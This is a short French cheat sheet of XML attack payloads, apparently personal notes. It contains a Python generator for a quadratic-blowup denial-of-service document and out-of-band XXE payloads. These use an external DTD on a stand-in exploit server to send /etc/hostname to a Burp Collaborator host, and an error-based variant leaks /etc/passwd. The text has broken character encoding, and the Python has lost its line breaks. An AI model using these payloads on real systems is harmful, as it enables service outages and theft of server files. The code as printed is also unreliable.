Si un attaquant dรฉfinit lโentitรฉ &x; avec 55000 caractรจres et se rรฉfรจre ร cette entitรฉ 55000 fois ร lโintรฉrieur de lโรฉlรฉment "DoS", lโanalyseur se retrouve avec une charge utile dโattaque de blowup quadratique XML lรฉgรจrement supรฉrieure ร 200 Ko qui passe ร 2,5 Go lors du parsing.
Script python:
#!/usr/bin/python3NUM =55000defmain(): entity ='A'* NUM refs ='&x;'* NUM templ ='''<?xml version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "{entity}"> ]> <DoS>{entityReferences}</DoS> '''.format(entity=entity, entityReferences=refs)print(templ)if__name__=='__main__':main()
Zip bomb
Exfiltration de donnรฉes
Avec Burp collab
Exploit server
Mettre ce payload dans un fichier .dtd
<!ENTITY % file SYSTEM "file:///etc/hostname"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'https://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">%eval;%exfil;
Victim server
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://EXPLOIT-SERVER/exploit.dtd"> %xxe;]>
Via message d'erreur
Exploit server
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">%eval;%exfil;
Victim server
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://EXPLOIT-SERVER/exploit.dtd"> %xxe;]>